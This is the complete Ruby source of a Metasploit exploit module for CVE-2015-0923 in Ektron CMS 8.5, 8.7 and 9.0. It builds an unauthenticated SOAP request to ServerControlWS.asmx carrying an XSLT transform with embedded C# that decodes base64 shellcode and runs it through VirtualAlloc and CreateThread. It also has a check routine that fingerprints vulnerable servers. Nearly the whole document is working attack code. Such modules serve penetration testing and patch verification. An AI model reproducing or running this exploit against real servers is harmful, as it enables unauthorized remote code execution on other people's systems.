Ektron 8.5 / 8.7 / 9.0 XSLT Transform Remote Code Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',  
'Description' => %q{ Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have  
vulnerabilities in various operations within the ServerControlWS.asmx  
web services. These vulnerabilities allow for RCE without authentication and  
execute in the context of IIS on the remote system.  
},  
'Author' => [  
'catatonicprime'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2015-0923' ],  
[ 'US-CERT-VU', '377644' ],  
[ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500  
},  
'Platform' => 'win',  
'Privileged' => true,  
'Targets' =>  
[  
['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Feb 05 2015'  
))  
  
register_options(  
[  
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),  
OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),  
OptEnum.new('TARGETOP',  
[  
true,  
'The vulnerable web service operation to exploit',  
'ContentBlockEx',  
[  
'ContentBlockEx',  
'GetBookmarkString',  
'GetContentFlaggingString',  
'GetContentRatingString',  
'GetMessagingString'  
]  
])  
], self.class )  
end  
  
  
def vulnerable_param  
return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'  
'xslt'  
end  
  
def required_params  
return '' if datastore['TARGETOP'] == 'ContentBlockEx'  
'<showmode/>'  
end  
  
def target_operation  
datastore['TARGETOP']  
end  
  
def prologue  
<<-XSLT  
<?xml version="1.0" encoding="utf-8"?>  
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  
<soap:Body>  
<#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">  
#{required_params}  
<#{vulnerable_param}>  
<![CDATA[  
<xsl:transform version="2.0"  
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  
xmlns:msxsl="urn:schemas-microsoft-com:xslt"  
xmlns:user="http://mycompany.com/mynamespace">  
<msxsl:script language="C#" implements-prefix="user">  
XSLT  
end  
  
def epilogue  
<<-XSLT  
</msxsl:script>  
<xsl:template match="/">  
<xsl:value-of select="user:xml()"/>  
</xsl:template>  
</xsl:transform>  
]]>  
</#{vulnerable_param}>  
</#{target_operation}>  
</soap:Body>  
</soap:Envelope>  
XSLT  
end  
  
def check  
  
fingerprint = rand_text_alpha(5 + rand(5))  
xslt_data = <<-XSLT  
#{prologue}  
public string xml() {  
return "#{fingerprint}";  
}  
#{epilogue}  
XSLT  
  
res = send_request_cgi(  
{  
'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => "text/xml; charset=UTF-8",  
'headers' => {  
"Referer" => build_referer  
},  
'data' => xslt_data  
})  
  
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def uri_path  
uri_path = target_uri.path  
uri_path << "/" if uri_path[-1, 1] != "/"  
uri_path  
end  
  
def build_referer  
if datastore['SSL']  
schema = "https://"  
else  
schema = "http://"  
end  
  
referer = schema  
referer << rhost  
referer << ":#{rport}"  
referer << uri_path  
referer  
end  
  
def exploit  
  
print_status("Generating the EXE Payload and the XSLT...")  
fingerprint = rand_text_alpha(5 + rand(5))  
  
xslt_data = <<-XSLT  
#{prologue}  
private static UInt32 MEM_COMMIT = 0x1000;  
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;  
  
[System.Runtime.InteropServices.DllImport("kernel32")]  
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);  
  
[System.Runtime.InteropServices.DllImport("kernel32")]  
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);  
  
public string xml()  
{  
string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";  
byte[] shellcode = System.Convert.FromBase64String(shellcode64);  
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);  
IntPtr hThread = IntPtr.Zero;  
IntPtr pinfo = IntPtr.Zero;  
UInt32 threadId = 0;  
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);  
return "#{fingerprint}";  
}  
#{epilogue}  
XSLT  
  
print_status("Trying to run the xslt transformation...")  
res = send_request_cgi(  
{  
'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => "text/xml; charset=UTF-8",  
'headers' => {  
"Referer" => build_referer  
},  
'data' => xslt_data  
})  
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/  
print_good("Exploitation was successful")  
else  
fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")  
end  
  
end  
end  
`